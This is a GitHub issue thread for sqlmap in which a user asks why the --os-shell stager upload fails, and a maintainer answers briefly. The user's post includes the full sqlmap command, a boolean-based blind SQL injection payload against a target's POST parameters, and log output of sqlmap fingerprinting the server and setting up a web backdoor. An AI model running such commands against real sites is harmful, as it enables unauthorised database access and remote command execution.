-
-
Notifications
You must be signed in to change notification settings - Fork 5.9k
Unable to load stager: "no input file specified" #824
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Comments
To me it seems that you are not using the latest revision from our repository. I am not able to reproducible this behaviour:
|
Also, it seems that you are dealing perhaps with the false positive or too lagging target:
|
Yeah I was really surprised when I saw it say "Linux" when I called the On Thu, Sep 11, 2014 at 1:28 AM, Miroslav Stampar [email protected]
|
:o I wish I could hug you On Thu, Sep 11, 2014 at 1:27 AM, Miroslav Stampar [email protected]
|
I have been unsuccessful in uploading a stager using sqlmap command --os-shell. When attempting, I receive the following warning "no input file specified". Can you please advice? I'd appreciate it. Here are the details:
This is exactly what I'm running
-r target.txt --time-sec 50 --hex --threads 9 -v 1 -o --os-shell
http://target.com/merchant.IHTML
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=3 AND 6384=6384&prodstring=:prodstring&step=2&Up=Next201&ViewFrom=4
[23:44:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0
back-end DBMS: MySQL 5
[23:44:31] [INFO] going to use a web backdoor for command prompt
[23:44:31] [INFO] fingerprinting the back-end DBMS operating system
[23:44:31] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
No paths were disclosed in the source code and the site is only 1 deep...for example target.com/a, target.com/b, target.com/c
My Operating System:
Windows 8.1 (rolls eyes)
The text was updated successfully, but these errors were encountered: